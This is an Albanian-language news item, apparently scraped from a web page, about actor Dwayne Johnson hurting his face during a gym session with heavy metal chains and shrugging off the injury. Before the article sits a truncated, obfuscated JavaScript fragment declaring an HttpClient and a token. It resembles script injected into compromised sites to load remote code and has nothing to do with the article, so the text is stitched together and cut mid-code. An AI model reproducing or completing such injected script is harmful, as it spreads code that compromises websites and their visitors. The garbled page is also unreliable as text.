;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Sesionet e ushtrimeve në palestër nganjëherë mund të jenë edhe të rrezikshme

By

Aktivitetet dhe ushtrimet në palestër me mjete të rënda, mund të jenë edhe të rrezikshme – mjafton të shihni videon e fundit të aktorit dhe entuziastit të ushtrimeve, Dwayne Johnson, që më shumë e njohim me nofkën, The Rock, që në shqip do të thotë Guri.

Edhe një herë e dëshmoi se sa shumë e meriton këtë emër, ku përkundër lëndimin që pati në fytyrë, ai tha se puna duhet të vazhdojë.

Aktori lëndoi veten gjatë një sesioni ushtrimesh me zingjirë të rëndë metali.

“Nganjëherë, ose shpeshherë, gjërat bëhen intensive këtu në parajsën e metalit, por nuk po luajmë tezesh dhe as nuk po këndojnë këngë fëmijësh”, thotë aktori në video.

“Lëndohesh nganjëherë, por janë gjëra që ndodhin”, thotë ai ndër të tjerash.

Artikuj të ngjashëm